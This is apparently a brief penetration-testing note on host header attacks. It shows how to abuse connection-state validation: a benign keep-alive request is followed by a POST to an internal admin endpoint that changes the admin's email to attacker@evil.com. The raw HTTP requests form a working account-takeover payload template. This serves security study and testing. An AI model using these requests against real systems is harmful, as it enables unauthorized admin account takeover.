Host Header Attack

- [exploiting](https://portswigger.net/web-security/host-header/exploiting)

Abuse Connection State

If the web server validates only the first request, we may be able to exploit the second request by keeping the connection and changing the Host header to the internal page.

1. Send the First Request

GET / HTTP/2
Host: example.com
...
Connection: keep-alive

2. Send the Second Request.

POST /admin/change-email HTTP/2
Host: 192.168.0.1

email=admin@example.com&new_email_1=attacker@evil.com&new_email_2=attacker@evil.com

As a result, we may be able to change the admin's email to arbitrary email.